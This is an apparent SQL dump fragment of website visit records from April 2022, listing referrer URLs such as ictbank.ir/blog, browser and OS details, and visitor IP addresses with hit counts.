(20367,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.148.191.140','000',0,2,0),
(20368,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.220.100.240','000',0,2,0),
(20369,'2022-04-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.56','000',0,2,0),
(20370,'2022-04-21','http://ictbank.ir/blog','Safari','iOS','15.4.1',NULL,NULL,'','167.71.62.154','000',0,1,0),
(20371,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','5.2',NULL,NULL,'','117.22.144.27','000',0,1,0),
(20372,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','185.220.102.254','000',0,1,0),
(20373,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','87.237.165.31','000',0,1,0),
(20374,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.94.151','000',0,1,0),
(20375,'2022-04-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(20376,'2022-04-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.200.4','000',0,2,0),
(20377,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.246.188.90','000',0,1,0),
(20378,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','146.19.213.76','000',0,1,0),
(20379,'2022-04-21','http://www.google.com','Firefox','Windows','11.1',NULL,NULL,'','65.108.126.123','000',0,2,0),
(20380,'2022-04-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(20381,'2022-04-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(20382,'2022-04-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(20383,'2022-04-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(20384,'2022-04-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','170.254.158.2','000',0,2,0),
(20385,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','124.6.249.48','000',0,4,0),
(20386,'2022-04-21','http://www.wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','206.189.128.24','000',0,1,0),
(20387,'2022-04-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(20388,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','194.110.115.18','000',0,2,0),
(20389,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.129.61.9','000',0,1,0),
(20390,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.220.102.244','000',0,1,0),
(20391,'2022-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.187.77.228','000',0,2,0),
(20392,'2022-04-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,14,0),
(20393,'2022-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','134.122.96.50','000',0,2,0),
(20394,'2022-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.100.33','000',0,1,0),
(20395,'2022-04-22','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','45.153.160.133','000',0,1,0),
(20396,'2022-04-22','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','51.15.59.15','000',0,1,0),
(20397,'2022-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.148.240.83','000',0,1,0),
(20398,'2022-04-22','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.237.174.17','000',0,1,0),
(20399,'2022-04-22','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','80.82.78.39','000',0,2,0),
(20400,'2022-04-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','137.74.169.241','000',0,1,0),
(20401,'2022-04-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','89.58.16.22','000',0,1,0),
(20402,'2022-04-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,6,0),
(20403,'2022-04-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.176.178','000',0,1,0),
(20404,'2022-04-22','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','185.220.101.49','000',0,1,0),
(20405,'2022-04-22','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','185.100.87.133','000',0,1,0),
(20406,'2022-04-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(20407,'2022-04-22','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','157.230.4.206','000',0,4,0),
(20408,'2022-04-22','http://ictbank.ir/blog','Chrome','OS X','10.7.5',NULL,NULL,'','172.107.241.110','000',0,2,0),
(20409,'2022-04-22','https://www.google.com/','Chrome','Windows','6.2',NULL,NULL,'','125.23.147.154','000',0,1,0),
(20410,'2022-04-22','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','188.165.87.108','000',0,1,0),
(20411,'2022-04-22','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','188.165.87.104','000',0,1,0),
(20412,'2022-04-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.79','000',0,2,0),
(20413,'2022-04-22','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','54.234.97.177','000',0,2,0),
(20414,'2022-04-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.220.100.254','000',0,2,0),
(20415,'2022-04-22','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','185.83.214.69','000',0,1,0),
(20416,'2022-04-22','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','193.218.118.125','000',0,1,0),
(20417,'2022-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.189.194','000',0,1,0),
(20418,'2022-04-22','http://82.102.9.14/blog','Unknown','Unknown','Unknown',NULL,NULL,'','64.227.78.50','000',0,1,0),
(20419,'2022-04-22','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','178.132.223.152','000',0,2,0),
(20420,'2022-04-22','http://ictbank.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','23.184.48.61','000',0,1,0),
(20421,'2022-04-22','http://ictbank.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','109.70.100.93','000',0,1,0),
(20422,'2022-04-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.90','000',0,2,0),
(20423,'2022-04-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.91.121.242','000',0,2,0),
(20424,'2022-04-22','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','199.249.230.171','000',0,1,0),
(20425,'2022-04-22','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','185.220.100.248','000',0,1,0),
(20426,'2022-04-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(20427,'2022-04-22','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','95.214.54.97','000',0,2,0),
(20428,'2022-04-22','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','134.122.134.160','000',0,3,0),
(20429,'2022-04-22','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','3.66.75.129','000',0,1,0),
(20430,'2022-04-23','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.140','000',0,1,0),
(20431,'2022-04-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','135.148.100.25','000',0,2,0),
(20432,'2022-04-23','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','77.76.140.186','000',0,1,0),
(20433,'2022-04-23','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','177.130.169.126','000',0,1,0),
(20434,'2022-04-23','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','220.221.175.17','000',0,1,0),
(20435,'2022-04-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(20436,'2022-04-23','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','80.82.78.39','000',0,2,0),
(20437,'2022-04-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','195.154.167.81','000',0,1,0),
(20438,'2022-04-23','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','51.91.121.242','000',0,4,0),
(20439,'2022-04-23','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','178.69.151.232','000',0,2,0),
(20440,'2022-04-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.56','000',0,2,0),
(20441,'2022-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.100.19','000',0,2,0),
(20442,'2022-04-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,5,0),
(20443,'2022-04-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,4,0),
(20444,'2022-04-23','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','89.46.223.134','000',0,1,0),
(20445,'2022-04-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.54.126.164','000',0,1,0),
(20446,'2022-04-23','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.65.194','000',0,1,0),
(20447,'2022-04-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.92.228.96','000',0,1,0),
(20448,'2022-04-23','http://ictbank.ir','Firefox','Linux','Unknown',NULL,NULL,'','199.249.230.75','000',0,1,0),
(20449,'2022-04-23','http://82.102.9.14/blog','Chrome','Android','7.0',NULL,NULL,'','124.126.78.132','000',0,1,0),
(20450,'2022-04-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(20451,'2022-04-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(20452,'2022-04-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(20453,'2022-04-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(20454,'2022-04-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.221','000',0,2,0),
(20455,'2022-04-23','http://www.design-arena.ir/?feed=rss2','Internet Explorer','Windows','6.1',NULL,NULL,'','139.9.169.41','000',0,2,0),
(20456,'2022-04-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.87.223.209','000',0,1,0),
(20457,'2022-04-23','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','100.38.105.82','000',0,1,0),
(20458,'2022-04-23','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','18.209.213.24','000',0,2,0),
(20459,'2022-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.113.215','000',0,1,0),
(20460,'2022-04-24','http://ictbank.ir/blog/','Firefox','Windows','6.1',NULL,NULL,'','92.191.29.118','000',0,1,0),
(20461,'2022-04-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20462,'2022-04-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.148.240.83','000',0,1,0),
(20463,'2022-04-24','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','35.88.50.155','000',0,1,0),
(20464,'2022-04-24','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','104.190.161.142','000',0,1,0),
(20465,'2022-04-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.140','000',0,2,0),
(20466,'2022-04-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.68.18.82','000',0,6,0),
(20467,'2022-04-24','https://www.google.com.hk/','Chrome','OS X','10.15.7',NULL,NULL,'','104.192.108.9','000',0,1,0),
(20468,'2022-04-24','https://www.google.com/','Chrome','Android','9',NULL,NULL,'','114.79.54.200','000',0,2,0),
(20469,'2022-04-24','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','54.218.252.191','000',0,1,0),
(20470,'2022-04-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(20471,'2022-04-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.59.169','000',0,1,0),
(20472,'2022-04-24','http://wikisonnati.com/blog/','Chrome','Windows','6.2',NULL,NULL,'','191.101.31.10','000',0,2,0),
(20473,'2022-04-24','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','42.236.10.93','000',0,1,0),
(20474,'2022-04-24','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','27.115.124.109','000',0,1,0),
(20475,'2022-04-24','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','27.115.124.101','000',0,1,0),
(20476,'2022-04-24','http://ictbank.ir/blog','Chrome','Android','8.0.0',NULL,NULL,'','107.175.59.141','000',0,2,0),
(20477,'2022-04-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,6,0),
(20478,'2022-04-24','http://ictbank.ir/blog','Chrome','OS X','10.9.4',NULL,NULL,'','148.153.97.211','000',0,1,0),
(20479,'2022-04-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.57','000',0,2,0),
(20480,'2022-04-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.110.221','000',0,1,0),
(20481,'2022-04-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','74.63.239.217','000',0,2,0),
(20482,'2022-04-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(20483,'2022-04-25','https://www.google.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','98.41.45.195','000',0,1,0),
(20484,'2022-04-25','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','51.91.121.242','000',0,8,0),
(20485,'2022-04-25','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.98','000',0,2,0),
(20486,'2022-04-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.2.203','000',0,1,0),
(20487,'2022-04-25','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','115.84.87.58','000',0,1,0),
(20488,'2022-04-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.197','000',0,2,0),
(20489,'2022-04-25','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.93','000',0,6,0),
(20490,'2022-04-25','http://www.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.242.249.246','000',0,2,0),
(20491,'2022-04-25','https://www.google.com/','Firefox','Linux','Unknown',NULL,NULL,'','68.183.213.211','000',0,1,0),
(20492,'2022-04-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(20493,'2022-04-25','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','37.120.203.87','000',0,2,0),
(20494,'2022-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.151.182','000',0,1,0),
(20495,'2022-04-25','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','80.82.78.39','000',0,1,0),
(20496,'2022-04-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20497,'2022-04-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(20498,'2022-04-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','108.61.208.75','000',0,1,0),
(20499,'2022-04-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(20500,'2022-04-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(20501,'2022-04-25','https://www.bing.com','Chrome','OS X','10.10.1',NULL,NULL,'','223.16.235.148','000',0,20,0),
(20502,'2022-04-25','http://ictbank.ir/blog','Firefox','OS X','10.13',NULL,NULL,'','65.108.150.230','000',0,1,0),
(20503,'2022-04-25','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','194.126.177.54','000',0,2,0),
(20504,'2022-04-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(20505,'2022-04-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.38','000',0,1,0),
(20506,'2022-04-25','https://www.google.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','198.167.192.7','000',0,1,0),
(20507,'2022-04-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','213.226.123.30','000',0,2,0),
(20508,'2022-04-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','213.226.123.30','000',0,6,0),
(20509,'2022-04-26','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','103.141.137.214','000',0,2,0),
(20510,'2022-04-26','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','80.82.78.39','000',0,3,0),
(20511,'2022-04-26','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','194.36.97.48','000',0,10,0),
(20512,'2022-04-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','197.243.61.202','000',0,1,0),
(20513,'2022-04-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','144.217.71.170','000',0,1,0),
(20514,'2022-04-26','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.71.10.105','000',0,2,0),
(20515,'2022-04-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.114','000',0,2,0),
(20516,'2022-04-26','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.75','000',0,1,0),
(20517,'2022-04-26','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.9','000',0,1,0),
(20518,'2022-04-26','http://www.design-arena.ir/?feed=rss2','Internet Explorer','Windows','6.1',NULL,NULL,'','139.9.169.41','000',0,2,0),
(20519,'2022-04-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.86.179.157','000',0,1,0),
(20520,'2022-04-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.171.173.178','000',0,1,0),
(20521,'2022-04-26','http://ictbank.ir/blog','Chrome','OS X','10.9.4',NULL,NULL,'','148.153.85.3','000',0,1,0),
(20522,'2022-04-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.122','000',0,2,0),
(20524,'2022-04-26','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.97','000',0,2,0),
(20525,'2022-04-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.0.16','000',0,1,0),
(20526,'2022-04-26','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','51.159.103.150','000',0,2,0),
(20527,'2022-04-26','http://82.102.9.14/blog','Chrome','Android','10.0',NULL,NULL,'','221.130.37.136','000',0,1,0),
(20528,'2022-04-26','http://www.ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.242.249.246','000',0,2,0),
(20529,'2022-04-26','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','134.209.152.246','000',0,4,0),
(20530,'2022-04-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(20531,'2022-04-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.221.200','000',0,1,0),
(20532,'2022-04-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.127.43','000',0,1,0),
(20533,'2022-04-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(20534,'2022-04-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(20535,'2022-04-26','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.229','000',0,1,0),
(20536,'2022-04-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.215.248.212','000',0,1,0),
(20537,'2022-04-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20538,'2022-04-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','213.226.123.30','000',0,5,0),
(20539,'2022-04-27','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.42','000',0,1,0),
(20540,'2022-04-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,3,0),
(20541,'2022-04-27','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','5.188.62.21','000',0,4,0),
(20542,'2022-04-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.199.64','000',0,2,0),
(20543,'2022-04-27','http://ictbank.ir/blog/','Chrome','Windows','6.2',NULL,NULL,'','94.19.237.85','000',0,6,0),
(20544,'2022-04-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.90','000',0,2,0),
(20545,'2022-04-27','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','185.128.26.218','000',0,2,0),
(20546,'2022-04-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.208.102.126','000',0,1,0),
(20547,'2022-04-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','206.189.194.131','000',0,2,0),
(20548,'2022-04-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.12','000',0,1,0),
(20549,'2022-04-27','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','98.97.20.113','000',0,1,0),
(20550,'2022-04-27','https://webtechsurvey.com/website/ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','23.229.104.2','000',0,3,0),
(20551,'2022-04-27','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','188.241.177.234','000',0,2,0),
(20552,'2022-04-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.88','000',0,2,0),
(20553,'2022-04-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.66','000',0,2,0),
(20554,'2022-04-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.79','000',0,2,0),
(20555,'2022-04-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.121.170.230','000',0,1,0),
(20556,'2022-04-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.92.109.27','000',0,1,0),
(20557,'2022-04-28','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','5.188.62.21','000',0,1,0),
(20558,'2022-04-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','213.226.123.30','000',0,10,0),
(20559,'2022-04-28','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.71.142.35','000',0,1,0),
(20560,'2022-04-28','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','118.126.82.170','000',0,6,0),
(20561,'2022-04-28','https://cn.bing.com/','Firefox','Windows','10.0',NULL,NULL,'','101.224.46.112','000',0,9,0),
(20562,'2022-04-28','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.114.247.54','000',0,1,0),
(20563,'2022-04-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.213.84.245','000',0,2,0),
(20564,'2022-04-28','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','147.161.185.3','000',0,8,0),
(20565,'2022-04-28','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','185.189.114.126','000',0,1,0),
(20566,'2022-04-28','https://myid.siemens.com/','Chrome','Windows','10.0',NULL,NULL,'','195.145.170.187','000',0,1,0),
(20567,'2022-04-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.225.15','000',0,2,0),
(20568,'2022-04-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.92.22.192','000',0,1,0),
(20569,'2022-04-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20570,'2022-04-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','108.179.192.55','000',0,1,0),
(20571,'2022-04-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.27.22.156','000',0,1,0),
(20572,'2022-04-28','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','182.3.71.15','000',0,1,0),
(20573,'2022-04-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.242.241.64','000',0,1,0),
(20574,'2022-04-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20575,'2022-04-28','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','5.115.59.75','000',0,2,0),
(20576,'2022-04-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.200.4','000',0,2,0),
(20577,'2022-04-28','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','116.202.209.244','000',0,9,0),
(20578,'2022-04-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.135','000',0,3,0),
(20579,'2022-04-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(20580,'2022-04-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.31.0.13','000',0,1,0),
(20581,'2022-04-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.251.216.134','000',0,2,0),
(20582,'2022-04-29','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','51.142.151.47','000',0,4,0),
(20583,'2022-04-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','213.226.123.30','000',0,7,0),
(20584,'2022-04-29','http://ictbank.ir/blog','Chrome','Android','8',NULL,NULL,'','65.108.72.49','000',0,1,0),
(20585,'2022-04-29','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','80.82.78.39','000',0,3,0),
(20586,'2022-04-29','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.191.34.215','000',0,3,0),
(20587,'2022-04-29','http://wikisonnati.com/blog','Chrome','iOS','12.1',NULL,NULL,'','88.99.80.23','000',0,2,0),
(20588,'2022-04-29','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','87.170.225.66','000',0,1,0),
(20589,'2022-04-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.57','000',0,2,0),
(20590,'2022-04-29','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','134.119.215.229','000',0,1,0),
(20591,'2022-04-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.68.78.227','000',0,1,0),
(20592,'2022-04-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.89.196.128','000',0,1,0),
(20593,'2022-04-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.63','000',0,1,0),
(20594,'2022-04-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,2,0),
(20595,'2022-04-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
